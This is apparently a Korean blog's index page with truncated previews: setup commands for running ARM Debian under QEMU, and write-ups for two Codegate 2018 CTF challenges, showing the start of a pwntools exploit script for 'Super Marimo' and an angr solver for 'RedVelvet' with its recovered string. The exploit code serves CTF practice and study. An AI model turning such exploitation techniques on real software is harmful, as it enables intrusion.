arm in qemu Qemu 에서 ARM debian 실행 # apt-get install qemu # wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2 # wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress # wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress * CUI 환경 + 인터넷 사용 # qemu-system-arm -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img.. 더보기 [Codegate 2018 CTF] Super Marimo # exploit.py from pwn import * from time import * def ShowMe(name, profile): p.sendline('show me the marimo') print p.recvuntil('>> ') p.sendline(name) print p.recvuntil('>> ') p.sendline(profile) print p.recvuntil('>> ') def View(index, data): p.sendline('V') print p.recvuntil('>> ') sleep(3) p.sendline(index) print p.recvuntil('>> ') p.sendline('M') print p.recvuntil('>> ') p.sendline(data) pr.. 더보기 [Codegate 2018 CTF] RedVelvet # exploit.py import angr def main(): proj = angr.Project('./RedVelvet', load_options={'auto_load_libs': False}) path_group = proj.factory.path_group(threads=4) path_group.explore(find=0x401631, avoid=(0x401621, 0x4016cb, )) return path_group.found[0].state.posix.dumps(1) if __name__=='__main__': print(repr(main())) 결과 값은 "What_You_Wanna_Be?:)_lc_la" 가 나오게 되는데, 게싱을 통해 아래와 같이 정확한 플래그 알아냈다. FLAG : .. 더보기 이전 1 2 3 4 5 6 7 ··· 46 다음